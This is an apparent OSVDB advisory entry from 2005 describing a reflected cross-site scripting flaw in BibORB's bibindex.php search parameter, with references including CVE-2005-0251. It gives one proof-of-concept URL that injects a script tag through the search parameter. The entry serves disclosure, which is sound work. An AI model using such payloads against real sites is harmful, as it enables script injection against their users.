BibORB bibindex.php search Variable XSS

2005-02-17T08:08:40
ID OSVDB:13912
Type osvdb
Reporter OSVDB
Modified 2005-02-17T08:08:40

Description

Manual Testing Notes

http://[victim]/bibindex.php?mode=displaysearch&search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=ID

References:

Vendor URL: http://biborb.glymn.net/ Security Tracker: 1013228 Secunia Advisory ID:14155 Related OSVDB ID: 13913 Related OSVDB ID: 13915 Related OSVDB ID: 13914 Related OSVDB ID: 13916 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0345.html CVE-2005-0251